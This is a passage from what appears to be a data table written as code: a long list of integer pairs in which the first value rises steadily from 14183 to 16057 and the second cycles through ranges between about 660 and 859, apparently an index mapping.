(14183, 711),
(14184, 712),
(14185, 712),
(14186, 712),
(14187, 712),
(14188, 712),
(14189, 712),
(14190, 713),
(14191, 713),
(14192, 713),
(14193, 713),
(14194, 713),
(14195, 713),
(14196, 713),
(14197, 713),
(14198, 713),
(14199, 714),
(14200, 714),
(14201, 714),
(14202, 714),
(14203, 714),
(14204, 714),
(14205, 715),
(14206, 715),
(14207, 715),
(14208, 715),
(14209, 715),
(14210, 715),
(14211, 716),
(14212, 716),
(14213, 716),
(14214, 716),
(14215, 716),
(14216, 716),
(14217, 717),
(14218, 717),
(14219, 717),
(14220, 717),
(14221, 717),
(14222, 717),
(14223, 718),
(14224, 718),
(14225, 718),
(14226, 718),
(14227, 718),
(14228, 718),
(14229, 719),
(14230, 719),
(14231, 719),
(14232, 719),
(14233, 719),
(14234, 719),
(14235, 719),
(14236, 719),
(14237, 719),
(14238, 720),
(14239, 720),
(14240, 720),
(14241, 720),
(14242, 720),
(14243, 720),
(14244, 721),
(14245, 721),
(14246, 721),
(14247, 721),
(14248, 721),
(14249, 721),
(14250, 722),
(14251, 722),
(14252, 722),
(14253, 722),
(14254, 722),
(14255, 722),
(14256, 723),
(14257, 723),
(14258, 723),
(14259, 723),
(14260, 723),
(14261, 723),
(14262, 724),
(14263, 724),
(14264, 724),
(14265, 724),
(14266, 724),
(14267, 724),
(14268, 725),
(14269, 725),
(14270, 725),
(14271, 725),
(14272, 725),
(14273, 725),
(14274, 725),
(14275, 725),
(14276, 725),
(14277, 726),
(14278, 726),
(14279, 726),
(14280, 726),
(14281, 726),
(14282, 726),
(14283, 727),
(14284, 727),
(14285, 727),
(14286, 727),
(14287, 727),
(14288, 727),
(14289, 728),
(14290, 728),
(14291, 728),
(14292, 728),
(14293, 728),
(14294, 728),
(14295, 729),
(14296, 729),
(14297, 729),
(14298, 729),
(14299, 729),
(14300, 729),
(14301, 730),
(14302, 730),
(14303, 730),
(14304, 730),
(14305, 730),
(14306, 730),
(14307, 731),
(14308, 731),
(14309, 731),
(14310, 731),
(14311, 731),
(14312, 731),
(14313, 731),
(14314, 731),
(14315, 731),
(14316, 732),
(14317, 732),
(14318, 732),
(14319, 732),
(14320, 732),
(14321, 732),
(14322, 733),
(14323, 733),
(14324, 733),
(14325, 733),
(14326, 733),
(14327, 733),
(14328, 734),
(14329, 734),
(14330, 734),
(14331, 734),
(14332, 734),
(14333, 734),
(14334, 735),
(14335, 735),
(14336, 735),
(14337, 735),
(14338, 735),
(14339, 735),
(14340, 736),
(14341, 736),
(14342, 736),
(14343, 736),
(14344, 736),
(14345, 736),
(14346, 737),
(14347, 737),
(14348, 737),
(14349, 737),
(14350, 737),
(14351, 737),
(14352, 737),
(14353, 737),
(14354, 737),
(14355, 738),
(14356, 738),
(14357, 738),
(14358, 738),
(14359, 738),
(14360, 738),
(14361, 739),
(14362, 739),
(14363, 739),
(14364, 739),
(14365, 739),
(14366, 739),
(14367, 740),
(14368, 740),
(14369, 740),
(14370, 740),
(14371, 740),
(14372, 740),
(14373, 741),
(14374, 741),
(14375, 741),
(14376, 741),
(14377, 741),
(14378, 741),
(14379, 742),
(14380, 742),
(14381, 742),
(14382, 742),
(14383, 742),
(14384, 742),
(14385, 743),
(14386, 743),
(14387, 743),
(14388, 743),
(14389, 743),
(14390, 743),
(14391, 744),
(14392, 744),
(14393, 744),
(14394, 744),
(14395, 744),
(14396, 744),
(14397, 745),
(14398, 745),
(14399, 745),
(14400, 745),
(14401, 745),
(14402, 745),
(14403, 746),
(14404, 746),
(14405, 746),
(14406, 746),
(14407, 746),
(14408, 746),
(14409, 747),
(14410, 747),
(14411, 747),
(14412, 747),
(14413, 747),
(14414, 747),
(14415, 748),
(14416, 748),
(14417, 748),
(14418, 748),
(14419, 748),
(14420, 748),
(14421, 749),
(14422, 749),
(14423, 749),
(14424, 749),
(14425, 749),
(14426, 749),
(14427, 750),
(14428, 750),
(14429, 750),
(14430, 750),
(14431, 750),
(14432, 750),
(14433, 750),
(14434, 750),
(14435, 750),
(14436, 751),
(14437, 751),
(14438, 751),
(14439, 751),
(14440, 751),
(14441, 751),
(14442, 752),
(14443, 752),
(14444, 752),
(14445, 752),
(14446, 752),
(14447, 752),
(14448, 753),
(14449, 753),
(14450, 753),
(14451, 753),
(14452, 753),
(14453, 753),
(14454, 754),
(14455, 754),
(14456, 754),
(14457, 754),
(14458, 754),
(14459, 754),
(14460, 755),
(14461, 755),
(14462, 755),
(14463, 755),
(14464, 755),
(14465, 755),
(14466, 756),
(14467, 756),
(14468, 756),
(14469, 756),
(14470, 756),
(14471, 756),
(14472, 757),
(14473, 757),
(14474, 757),
(14475, 757),
(14476, 757),
(14477, 757),
(14478, 758),
(14479, 758),
(14480, 758),
(14481, 758),
(14482, 758),
(14483, 758),
(14484, 759),
(14485, 759),
(14486, 759),
(14487, 759),
(14488, 759),
(14489, 759),
(14490, 660),
(14491, 660),
(14492, 661),
(14493, 661),
(14494, 662),
(14495, 662),
(14496, 663),
(14497, 663),
(14498, 664),
(14499, 664),
(14500, 665),
(14501, 665),
(14502, 666),
(14503, 666),
(14504, 667),
(14505, 668),
(14506, 668),
(14507, 669),
(14508, 669),
(14509, 670),
(14510, 670),
(14511, 671),
(14512, 671),
(14513, 672),
(14514, 672),
(14515, 673),
(14516, 673),
(14517, 674),
(14518, 674),
(14519, 675),
(14520, 675),
(14521, 676),
(14522, 676),
(14523, 677),
(14524, 677),
(14525, 678),
(14526, 678),
(14527, 679),
(14528, 679),
(14529, 680),
(14530, 680),
(14531, 681),
(14532, 681),
(14533, 682),
(14534, 682),
(14535, 683),
(14536, 684),
(14537, 684),
(14538, 685),
(14539, 685),
(14540, 686),
(14541, 686),
(14542, 687),
(14543, 687),
(14544, 688),
(14545, 688),
(14546, 689),
(14547, 690),
(14548, 690),
(14549, 691),
(14550, 691),
(14551, 692),
(14552, 692),
(14553, 693),
(14554, 693),
(14555, 694),
(14556, 694),
(14557, 695),
(14558, 696),
(14559, 696),
(14560, 697),
(14561, 697),
(14562, 698),
(14563, 698),
(14564, 699),
(14565, 699),
(14566, 700),
(14567, 700),
(14568, 701),
(14569, 702),
(14570, 702),
(14571, 703),
(14572, 703),
(14573, 704),
(14574, 704),
(14575, 705),
(14576, 705),
(14577, 706),
(14578, 706),
(14579, 707),
(14580, 708),
(14581, 708),
(14582, 709),
(14583, 709),
(14584, 710),
(14585, 710),
(14586, 711),
(14587, 711),
(14588, 712),
(14589, 712),
(14590, 713),
(14591, 714),
(14592, 714),
(14593, 715),
(14594, 715),
(14595, 716),
(14596, 716),
(14597, 717),
(14598, 717),
(14599, 718),
(14600, 718),
(14601, 719),
(14602, 720),
(14603, 720),
(14604, 721),
(14605, 721),
(14606, 722),
(14607, 722),
(14608, 723),
(14609, 723),
(14610, 724),
(14611, 724),
(14612, 725),
(14613, 726),
(14614, 726),
(14615, 727),
(14616, 727),
(14617, 728),
(14618, 728),
(14619, 729),
(14620, 729),
(14621, 730),
(14622, 730),
(14623, 731),
(14624, 732),
(14625, 732),
(14626, 733),
(14627, 733),
(14628, 734),
(14629, 734),
(14630, 735),
(14631, 735),
(14632, 736),
(14633, 736),
(14634, 737),
(14635, 738),
(14636, 738),
(14637, 739),
(14638, 739),
(14639, 740),
(14640, 740),
(14641, 741),
(14642, 741),
(14643, 742),
(14644, 742),
(14645, 743),
(14646, 743),
(14647, 744),
(14648, 744),
(14649, 745),
(14650, 745),
(14651, 746),
(14652, 746),
(14653, 747),
(14654, 747),
(14655, 748),
(14656, 748),
(14657, 749),
(14658, 749),
(14659, 750),
(14660, 751),
(14661, 751),
(14662, 752),
(14663, 752),
(14664, 753),
(14665, 753),
(14666, 754),
(14667, 754),
(14668, 755),
(14669, 755),
(14670, 756),
(14671, 756),
(14672, 757),
(14673, 757),
(14674, 758),
(14675, 758),
(14676, 759),
(14677, 759),
(14678, 760),
(14679, 761),
(14680, 762),
(14681, 763),
(14682, 764),
(14683, 765),
(14684, 766),
(14685, 767),
(14686, 768),
(14687, 769),
(14688, 770),
(14689, 771),
(14690, 772),
(14691, 773),
(14692, 774),
(14693, 775),
(14694, 776),
(14695, 777),
(14696, 778),
(14697, 779),
(14698, 780),
(14699, 781),
(14700, 782),
(14701, 783),
(14702, 784),
(14703, 785),
(14704, 786),
(14705, 787),
(14706, 788),
(14707, 789),
(14708, 790),
(14709, 791),
(14710, 792),
(14711, 793),
(14712, 794),
(14713, 795),
(14714, 796),
(14715, 797),
(14716, 798),
(14717, 799),
(14718, 800),
(14719, 801),
(14720, 802),
(14721, 803),
(14722, 804),
(14723, 805),
(14724, 806),
(14725, 807),
(14726, 808),
(14727, 809),
(14728, 810),
(14729, 811),
(14730, 812),
(14731, 813),
(14732, 814),
(14733, 815),
(14734, 816),
(14735, 817),
(14736, 818),
(14737, 819),
(14738, 820),
(14739, 821),
(14740, 822),
(14741, 823),
(14742, 824),
(14743, 825),
(14744, 826),
(14745, 827),
(14746, 828),
(14747, 829),
(14748, 830),
(14749, 831),
(14750, 832),
(14751, 833),
(14752, 834),
(14753, 835),
(14754, 836),
(14755, 837),
(14756, 838),
(14757, 839),
(14758, 840),
(14759, 841),
(14760, 842),
(14761, 843),
(14762, 844),
(14763, 845),
(14764, 846),
(14765, 847),
(14766, 848),
(14767, 849),
(14768, 850),
(14769, 851),
(14770, 852),
(14771, 853),
(14772, 854),
(14773, 855),
(14774, 856),
(14775, 857),
(14776, 858),
(14777, 859),
(14778, 760),
(14779, 761),
(14780, 761),
(14781, 762),
(14782, 763),
(14783, 763),
(14784, 764),
(14785, 765),
(14786, 766),
(14787, 767),
(14788, 768),
(14789, 769),
(14790, 770),
(14791, 771),
(14792, 772),
(14793, 773),
(14794, 774),
(14795, 775),
(14796, 776),
(14797, 776),
(14798, 776),
(14799, 777),
(14800, 778),
(14801, 778),
(14802, 779),
(14803, 780),
(14804, 781),
(14805, 781),
(14806, 782),
(14807, 783),
(14808, 784),
(14809, 784),
(14810, 785),
(14811, 786),
(14812, 787),
(14813, 787),
(14814, 788),
(14815, 789),
(14816, 789),
(14817, 790),
(14818, 791),
(14819, 791),
(14820, 791),
(14821, 792),
(14822, 793),
(14823, 794),
(14824, 794),
(14825, 794),
(14826, 795),
(14827, 796),
(14828, 797),
(14829, 797),
(14830, 797),
(14831, 798),
(14832, 799),
(14833, 800),
(14834, 800),
(14835, 800),
(14836, 801),
(14837, 802),
(14838, 802),
(14839, 802),
(14840, 803),
(14841, 803),
(14842, 803),
(14843, 804),
(14844, 805),
(14845, 806),
(14846, 806),
(14847, 806),
(14848, 807),
(14849, 808),
(14850, 809),
(14851, 809),
(14852, 809),
(14853, 810),
(14854, 811),
(14855, 812),
(14856, 812),
(14857, 812),
(14858, 813),
(14859, 814),
(14860, 815),
(14861, 815),
(14862, 815),
(14863, 816),
(14864, 817),
(14865, 817),
(14866, 817),
(14867, 817),
(14868, 817),
(14869, 818),
(14870, 819),
(14871, 820),
(14872, 820),
(14873, 820),
(14874, 820),
(14875, 820),
(14876, 821),
(14877, 822),
(14878, 823),
(14879, 823),
(14880, 823),
(14881, 823),
(14882, 823),
(14883, 824),
(14884, 825),
(14885, 826),
(14886, 826),
(14887, 826),
(14888, 826),
(14889, 826),
(14890, 827),
(14891, 828),
(14892, 828),
(14893, 828),
(14894, 828),
(14895, 828),
(14896, 829),
(14897, 830),
(14898, 830),
(14899, 830),
(14900, 831),
(14901, 832),
(14902, 833),
(14903, 833),
(14904, 833),
(14905, 834),
(14906, 835),
(14907, 836),
(14908, 836),
(14909, 836),
(14910, 837),
(14911, 838),
(14912, 839),
(14913, 839),
(14914, 839),
(14915, 840),
(14916, 841),
(14917, 841),
(14918, 841),
(14919, 842),
(14920, 843),
(14921, 843),
(14922, 843),
(14923, 844),
(14924, 845),
(14925, 846),
(14926, 846),
(14927, 846),
(14928, 847),
(14929, 848),
(14930, 849),
(14931, 849),
(14932, 849),
(14933, 850),
(14934, 851),
(14935, 852),
(14936, 852),
(14937, 852),
(14938, 853),
(14939, 854),
(14940, 854),
(14941, 854),
(14942, 855),
(14943, 855),
(14944, 855),
(14945, 856),
(14946, 857),
(14947, 858),
(14948, 858),
(14949, 858),
(14950, 859),
(14951, 760),
(14952, 760),
(14953, 760),
(14954, 760),
(14955, 760),
(14956, 760),
(14957, 760),
(14958, 761),
(14959, 761),
(14960, 761),
(14961, 761),
(14962, 761),
(14963, 761),
(14964, 761),
(14965, 762),
(14966, 762),
(14967, 762),
(14968, 762),
(14969, 762),
(14970, 762),
(14971, 762),
(14972, 763),
(14973, 763),
(14974, 763),
(14975, 763),
(14976, 763),
(14977, 763),
(14978, 763),
(14979, 763),
(14980, 763),
(14981, 763),
(14982, 763),
(14983, 764),
(14984, 764),
(14985, 764),
(14986, 764),
(14987, 764),
(14988, 764),
(14989, 764),
(14990, 765),
(14991, 765),
(14992, 765),
(14993, 765),
(14994, 765),
(14995, 765),
(14996, 765),
(14997, 766),
(14998, 766),
(14999, 766),
(15000, 766),
(15001, 766),
(15002, 766),
(15003, 766),
(15004, 767),
(15005, 767),
(15006, 767),
(15007, 767),
(15008, 767),
(15009, 767),
(15010, 767),
(15011, 768),
(15012, 768),
(15013, 768),
(15014, 768),
(15015, 768),
(15016, 768),
(15017, 768),
(15018, 769),
(15019, 769),
(15020, 769),
(15021, 769),
(15022, 769),
(15023, 769),
(15024, 769),
(15025, 770),
(15026, 770),
(15027, 770),
(15028, 770),
(15029, 770),
(15030, 770),
(15031, 770),
(15032, 771),
(15033, 771),
(15034, 771),
(15035, 771),
(15036, 771),
(15037, 771),
(15038, 771),
(15039, 772),
(15040, 772),
(15041, 772),
(15042, 772),
(15043, 772),
(15044, 772),
(15045, 772),
(15046, 773),
(15047, 773),
(15048, 773),
(15049, 773),
(15050, 773),
(15051, 773),
(15052, 773),
(15053, 774),
(15054, 774),
(15055, 774),
(15056, 774),
(15057, 774),
(15058, 774),
(15059, 774),
(15060, 775),
(15061, 775),
(15062, 775),
(15063, 775),
(15064, 775),
(15065, 775),
(15066, 775),
(15067, 776),
(15068, 776),
(15069, 776),
(15070, 776),
(15071, 776),
(15072, 776),
(15073, 776),
(15074, 776),
(15075, 776),
(15076, 776),
(15077, 776),
(15078, 777),
(15079, 777),
(15080, 777),
(15081, 777),
(15082, 777),
(15083, 777),
(15084, 777),
(15085, 778),
(15086, 778),
(15087, 778),
(15088, 778),
(15089, 778),
(15090, 778),
(15091, 778),
(15092, 779),
(15093, 779),
(15094, 779),
(15095, 779),
(15096, 779),
(15097, 779),
(15098, 779),
(15099, 780),
(15100, 780),
(15101, 780),
(15102, 780),
(15103, 780),
(15104, 780),
(15105, 780),
(15106, 781),
(15107, 781),
(15108, 781),
(15109, 781),
(15110, 781),
(15111, 781),
(15112, 781),
(15113, 782),
(15114, 782),
(15115, 782),
(15116, 782),
(15117, 782),
(15118, 782),
(15119, 782),
(15120, 783),
(15121, 783),
(15122, 783),
(15123, 783),
(15124, 783),
(15125, 783),
(15126, 783),
(15127, 784),
(15128, 784),
(15129, 784),
(15130, 784),
(15131, 784),
(15132, 784),
(15133, 784),
(15134, 785),
(15135, 785),
(15136, 785),
(15137, 785),
(15138, 785),
(15139, 785),
(15140, 785),
(15141, 786),
(15142, 786),
(15143, 786),
(15144, 786),
(15145, 786),
(15146, 786),
(15147, 786),
(15148, 787),
(15149, 787),
(15150, 787),
(15151, 787),
(15152, 787),
(15153, 787),
(15154, 787),
(15155, 788),
(15156, 788),
(15157, 788),
(15158, 788),
(15159, 788),
(15160, 788),
(15161, 788),
(15162, 789),
(15163, 789),
(15164, 789),
(15165, 789),
(15166, 789),
(15167, 789),
(15168, 789),
(15169, 789),
(15170, 789),
(15171, 789),
(15172, 789),
(15173, 790),
(15174, 790),
(15175, 790),
(15176, 790),
(15177, 790),
(15178, 790),
(15179, 790),
(15180, 791),
(15181, 791),
(15182, 791),
(15183, 791),
(15184, 791),
(15185, 791),
(15186, 791),
(15187, 792),
(15188, 792),
(15189, 792),
(15190, 792),
(15191, 792),
(15192, 792),
(15193, 792),
(15194, 793),
(15195, 793),
(15196, 793),
(15197, 793),
(15198, 793),
(15199, 793),
(15200, 793),
(15201, 794),
(15202, 794),
(15203, 794),
(15204, 794),
(15205, 794),
(15206, 794),
(15207, 794),
(15208, 795),
(15209, 795),
(15210, 795),
(15211, 795),
(15212, 795),
(15213, 795),
(15214, 795),
(15215, 796),
(15216, 796),
(15217, 796),
(15218, 796),
(15219, 796),
(15220, 796),
(15221, 796),
(15222, 797),
(15223, 797),
(15224, 797),
(15225, 797),
(15226, 797),
(15227, 797),
(15228, 797),
(15229, 798),
(15230, 798),
(15231, 798),
(15232, 798),
(15233, 798),
(15234, 798),
(15235, 798),
(15236, 799),
(15237, 799),
(15238, 799),
(15239, 799),
(15240, 799),
(15241, 799),
(15242, 799),
(15243, 800),
(15244, 800),
(15245, 800),
(15246, 800),
(15247, 800),
(15248, 800),
(15249, 800),
(15250, 801),
(15251, 801),
(15252, 801),
(15253, 801),
(15254, 801),
(15255, 801),
(15256, 801),
(15257, 802),
(15258, 802),
(15259, 802),
(15260, 802),
(15261, 802),
(15262, 802),
(15263, 802),
(15264, 802),
(15265, 802),
(15266, 802),
(15267, 802),
(15268, 803),
(15269, 803),
(15270, 803),
(15271, 803),
(15272, 803),
(15273, 803),
(15274, 803),
(15275, 804),
(15276, 804),
(15277, 804),
(15278, 804),
(15279, 804),
(15280, 804),
(15281, 804),
(15282, 805),
(15283, 805),
(15284, 805),
(15285, 805),
(15286, 805),
(15287, 805),
(15288, 805),
(15289, 806),
(15290, 806),
(15291, 806),
(15292, 806),
(15293, 806),
(15294, 806),
(15295, 806),
(15296, 807),
(15297, 807),
(15298, 807),
(15299, 807),
(15300, 807),
(15301, 807),
(15302, 807),
(15303, 808),
(15304, 808),
(15305, 808),
(15306, 808),
(15307, 808),
(15308, 808),
(15309, 808),
(15310, 809),
(15311, 809),
(15312, 809),
(15313, 809),
(15314, 809),
(15315, 809),
(15316, 809),
(15317, 810),
(15318, 810),
(15319, 810),
(15320, 810),
(15321, 810),
(15322, 810),
(15323, 810),
(15324, 811),
(15325, 811),
(15326, 811),
(15327, 811),
(15328, 811),
(15329, 811),
(15330, 811),
(15331, 812),
(15332, 812),
(15333, 812),
(15334, 812),
(15335, 812),
(15336, 812),
(15337, 812),
(15338, 813),
(15339, 813),
(15340, 813),
(15341, 813),
(15342, 813),
(15343, 813),
(15344, 813),
(15345, 814),
(15346, 814),
(15347, 814),
(15348, 814),
(15349, 814),
(15350, 814),
(15351, 814),
(15352, 815),
(15353, 815),
(15354, 815),
(15355, 815),
(15356, 815),
(15357, 815),
(15358, 815),
(15359, 815),
(15360, 815),
(15361, 815),
(15362, 815),
(15363, 816),
(15364, 816),
(15365, 816),
(15366, 816),
(15367, 816),
(15368, 816),
(15369, 816),
(15370, 817),
(15371, 817),
(15372, 817),
(15373, 817),
(15374, 817),
(15375, 817),
(15376, 817),
(15377, 818),
(15378, 818),
(15379, 818),
(15380, 818),
(15381, 818),
(15382, 818),
(15383, 818),
(15384, 819),
(15385, 819),
(15386, 819),
(15387, 819),
(15388, 819),
(15389, 819),
(15390, 819),
(15391, 820),
(15392, 820),
(15393, 820),
(15394, 820),
(15395, 820),
(15396, 820),
(15397, 820),
(15398, 821),
(15399, 821),
(15400, 821),
(15401, 821),
(15402, 821),
(15403, 821),
(15404, 821),
(15405, 822),
(15406, 822),
(15407, 822),
(15408, 822),
(15409, 822),
(15410, 822),
(15411, 822),
(15412, 823),
(15413, 823),
(15414, 823),
(15415, 823),
(15416, 823),
(15417, 823),
(15418, 823),
(15419, 824),
(15420, 824),
(15421, 824),
(15422, 824),
(15423, 824),
(15424, 824),
(15425, 824),
(15426, 825),
(15427, 825),
(15428, 825),
(15429, 825),
(15430, 825),
(15431, 825),
(15432, 825),
(15433, 826),
(15434, 826),
(15435, 826),
(15436, 826),
(15437, 826),
(15438, 826),
(15439, 826),
(15440, 827),
(15441, 827),
(15442, 827),
(15443, 827),
(15444, 827),
(15445, 827),
(15446, 827),
(15447, 828),
(15448, 828),
(15449, 828),
(15450, 828),
(15451, 828),
(15452, 828),
(15453, 828),
(15454, 828),
(15455, 828),
(15456, 828),
(15457, 828),
(15458, 829),
(15459, 829),
(15460, 829),
(15461, 829),
(15462, 829),
(15463, 829),
(15464, 829),
(15465, 830),
(15466, 830),
(15467, 830),
(15468, 830),
(15469, 830),
(15470, 830),
(15471, 830),
(15472, 831),
(15473, 831),
(15474, 831),
(15475, 831),
(15476, 831),
(15477, 831),
(15478, 831),
(15479, 832),
(15480, 832),
(15481, 832),
(15482, 832),
(15483, 832),
(15484, 832),
(15485, 832),
(15486, 833),
(15487, 833),
(15488, 833),
(15489, 833),
(15490, 833),
(15491, 833),
(15492, 833),
(15493, 834),
(15494, 834),
(15495, 834),
(15496, 834),
(15497, 834),
(15498, 834),
(15499, 834),
(15500, 835),
(15501, 835),
(15502, 835),
(15503, 835),
(15504, 835),
(15505, 835),
(15506, 835),
(15507, 836),
(15508, 836),
(15509, 836),
(15510, 836),
(15511, 836),
(15512, 836),
(15513, 836),
(15514, 837),
(15515, 837),
(15516, 837),
(15517, 837),
(15518, 837),
(15519, 837),
(15520, 837),
(15521, 838),
(15522, 838),
(15523, 838),
(15524, 838),
(15525, 838),
(15526, 838),
(15527, 838),
(15528, 839),
(15529, 839),
(15530, 839),
(15531, 839),
(15532, 839),
(15533, 839),
(15534, 839),
(15535, 840),
(15536, 840),
(15537, 840),
(15538, 840),
(15539, 840),
(15540, 840),
(15541, 840),
(15542, 841),
(15543, 841),
(15544, 841),
(15545, 841),
(15546, 841),
(15547, 841),
(15548, 841),
(15549, 841),
(15550, 841),
(15551, 841),
(15552, 841),
(15553, 842),
(15554, 842),
(15555, 842),
(15556, 842),
(15557, 842),
(15558, 842),
(15559, 842),
(15560, 843),
(15561, 843),
(15562, 843),
(15563, 843),
(15564, 843),
(15565, 843),
(15566, 843),
(15567, 844),
(15568, 844),
(15569, 844),
(15570, 844),
(15571, 844),
(15572, 844),
(15573, 844),
(15574, 845),
(15575, 845),
(15576, 845),
(15577, 845),
(15578, 845),
(15579, 845),
(15580, 845),
(15581, 846),
(15582, 846),
(15583, 846),
(15584, 846),
(15585, 846),
(15586, 846),
(15587, 846),
(15588, 847),
(15589, 847),
(15590, 847),
(15591, 847),
(15592, 847),
(15593, 847),
(15594, 847),
(15595, 848),
(15596, 848),
(15597, 848),
(15598, 848),
(15599, 848),
(15600, 848),
(15601, 848),
(15602, 849),
(15603, 849),
(15604, 849),
(15605, 849),
(15606, 849),
(15607, 849),
(15608, 849),
(15609, 850),
(15610, 850),
(15611, 850),
(15612, 850),
(15613, 850),
(15614, 850),
(15615, 850),
(15616, 851),
(15617, 851),
(15618, 851),
(15619, 851),
(15620, 851),
(15621, 851),
(15622, 851),
(15623, 852),
(15624, 852),
(15625, 852),
(15626, 852),
(15627, 852),
(15628, 852),
(15629, 852),
(15630, 853),
(15631, 853),
(15632, 853),
(15633, 853),
(15634, 853),
(15635, 853),
(15636, 853),
(15637, 854),
(15638, 854),
(15639, 854),
(15640, 854),
(15641, 854),
(15642, 854),
(15643, 854),
(15644, 854),
(15645, 854),
(15646, 854),
(15647, 854),
(15648, 855),
(15649, 855),
(15650, 855),
(15651, 855),
(15652, 855),
(15653, 855),
(15654, 855),
(15655, 856),
(15656, 856),
(15657, 856),
(15658, 856),
(15659, 856),
(15660, 856),
(15661, 856),
(15662, 857),
(15663, 857),
(15664, 857),
(15665, 857),
(15666, 857),
(15667, 857),
(15668, 857),
(15669, 858),
(15670, 858),
(15671, 858),
(15672, 858),
(15673, 858),
(15674, 858),
(15675, 858),
(15676, 859),
(15677, 859),
(15678, 859),
(15679, 859),
(15680, 859),
(15681, 859),
(15682, 859),
(15683, 760),
(15684, 761),
(15685, 762),
(15686, 763),
(15687, 764),
(15688, 765),
(15689, 766),
(15690, 767),
(15691, 768),
(15692, 769),
(15693, 770),
(15694, 771),
(15695, 772),
(15696, 773),
(15697, 774),
(15698, 775),
(15699, 776),
(15700, 777),
(15701, 778),
(15702, 779),
(15703, 780),
(15704, 781),
(15705, 782),
(15706, 783),
(15707, 784),
(15708, 785),
(15709, 786),
(15710, 787),
(15711, 788),
(15712, 789),
(15713, 790),
(15714, 791),
(15715, 792),
(15716, 793),
(15717, 794),
(15718, 795),
(15719, 796),
(15720, 797),
(15721, 798),
(15722, 799),
(15723, 800),
(15724, 801),
(15725, 802),
(15726, 803),
(15727, 804),
(15728, 805),
(15729, 806),
(15730, 807),
(15731, 808),
(15732, 809),
(15733, 810),
(15734, 811),
(15735, 812),
(15736, 813),
(15737, 814),
(15738, 815),
(15739, 816),
(15740, 817),
(15741, 818),
(15742, 819),
(15743, 820),
(15744, 821),
(15745, 822),
(15746, 823),
(15747, 824),
(15748, 825),
(15749, 826),
(15750, 827),
(15751, 828),
(15752, 829),
(15753, 830),
(15754, 831),
(15755, 832),
(15756, 833),
(15757, 834),
(15758, 835),
(15759, 836),
(15760, 837),
(15761, 838),
(15762, 839),
(15763, 840),
(15764, 841),
(15765, 842),
(15766, 843),
(15767, 844),
(15768, 845),
(15769, 846),
(15770, 847),
(15771, 848),
(15772, 849),
(15773, 850),
(15774, 851),
(15775, 852),
(15776, 853),
(15777, 854),
(15778, 855),
(15779, 856),
(15780, 857),
(15781, 858),
(15782, 859),
(15783, 760),
(15784, 760),
(15785, 760),
(15786, 760),
(15787, 760),
(15788, 760),
(15789, 761),
(15790, 761),
(15791, 761),
(15792, 761),
(15793, 761),
(15794, 761),
(15795, 762),
(15796, 762),
(15797, 762),
(15798, 762),
(15799, 762),
(15800, 762),
(15801, 763),
(15802, 763),
(15803, 763),
(15804, 763),
(15805, 763),
(15806, 763),
(15807, 763),
(15808, 763),
(15809, 763),
(15810, 764),
(15811, 764),
(15812, 764),
(15813, 764),
(15814, 764),
(15815, 764),
(15816, 765),
(15817, 765),
(15818, 765),
(15819, 765),
(15820, 765),
(15821, 765),
(15822, 766),
(15823, 766),
(15824, 766),
(15825, 766),
(15826, 766),
(15827, 766),
(15828, 767),
(15829, 767),
(15830, 767),
(15831, 767),
(15832, 767),
(15833, 767),
(15834, 768),
(15835, 768),
(15836, 768),
(15837, 768),
(15838, 768),
(15839, 768),
(15840, 769),
(15841, 769),
(15842, 769),
(15843, 769),
(15844, 769),
(15845, 769),
(15846, 770),
(15847, 770),
(15848, 770),
(15849, 770),
(15850, 770),
(15851, 770),
(15852, 771),
(15853, 771),
(15854, 771),
(15855, 771),
(15856, 771),
(15857, 771),
(15858, 772),
(15859, 772),
(15860, 772),
(15861, 772),
(15862, 772),
(15863, 772),
(15864, 773),
(15865, 773),
(15866, 773),
(15867, 773),
(15868, 773),
(15869, 773),
(15870, 774),
(15871, 774),
(15872, 774),
(15873, 774),
(15874, 774),
(15875, 774),
(15876, 775),
(15877, 775),
(15878, 775),
(15879, 775),
(15880, 775),
(15881, 775),
(15882, 776),
(15883, 776),
(15884, 776),
(15885, 776),
(15886, 776),
(15887, 776),
(15888, 776),
(15889, 776),
(15890, 776),
(15891, 777),
(15892, 777),
(15893, 777),
(15894, 777),
(15895, 777),
(15896, 777),
(15897, 778),
(15898, 778),
(15899, 778),
(15900, 778),
(15901, 778),
(15902, 778),
(15903, 779),
(15904, 779),
(15905, 779),
(15906, 779),
(15907, 779),
(15908, 779),
(15909, 780),
(15910, 780),
(15911, 780),
(15912, 780),
(15913, 780),
(15914, 780),
(15915, 781),
(15916, 781),
(15917, 781),
(15918, 781),
(15919, 781),
(15920, 781),
(15921, 782),
(15922, 782),
(15923, 782),
(15924, 782),
(15925, 782),
(15926, 782),
(15927, 783),
(15928, 783),
(15929, 783),
(15930, 783),
(15931, 783),
(15932, 783),
(15933, 784),
(15934, 784),
(15935, 784),
(15936, 784),
(15937, 784),
(15938, 784),
(15939, 785),
(15940, 785),
(15941, 785),
(15942, 785),
(15943, 785),
(15944, 785),
(15945, 786),
(15946, 786),
(15947, 786),
(15948, 786),
(15949, 786),
(15950, 786),
(15951, 787),
(15952, 787),
(15953, 787),
(15954, 787),
(15955, 787),
(15956, 787),
(15957, 788),
(15958, 788),
(15959, 788),
(15960, 788),
(15961, 788),
(15962, 788),
(15963, 789),
(15964, 789),
(15965, 789),
(15966, 789),
(15967, 789),
(15968, 789),
(15969, 789),
(15970, 789),
(15971, 789),
(15972, 790),
(15973, 790),
(15974, 790),
(15975, 790),
(15976, 790),
(15977, 790),
(15978, 791),
(15979, 791),
(15980, 791),
(15981, 791),
(15982, 791),
(15983, 791),
(15984, 792),
(15985, 792),
(15986, 792),
(15987, 792),
(15988, 792),
(15989, 792),
(15990, 793),
(15991, 793),
(15992, 793),
(15993, 793),
(15994, 793),
(15995, 793),
(15996, 794),
(15997, 794),
(15998, 794),
(15999, 794),
(16000, 794),
(16001, 794),
(16002, 795),
(16003, 795),
(16004, 795),
(16005, 795),
(16006, 795),
(16007, 795),
(16008, 796),
(16009, 796),
(16010, 796),
(16011, 796),
(16012, 796),
(16013, 796),
(16014, 797),
(16015, 797),
(16016, 797),
(16017, 797),
(16018, 797),
(16019, 797),
(16020, 798),
(16021, 798),
(16022, 798),
(16023, 798),
(16024, 798),
(16025, 798),
(16026, 799),
(16027, 799),
(16028, 799),
(16029, 799),
(16030, 799),
(16031, 799),
(16032, 800),
(16033, 800),
(16034, 800),
(16035, 800),
(16036, 800),
(16037, 800),
(16038, 801),
(16039, 801),
(16040, 801),
(16041, 801),
(16042, 801),
(16043, 801),
(16044, 802),
(16045, 802),
(16046, 802),
(16047, 802),
(16048, 802),
(16049, 802),
(16050, 802),
(16051, 802),
(16052, 802),
(16053, 803),
(16054, 803),
(16055, 803),
(16056, 803),
(16057, 803),
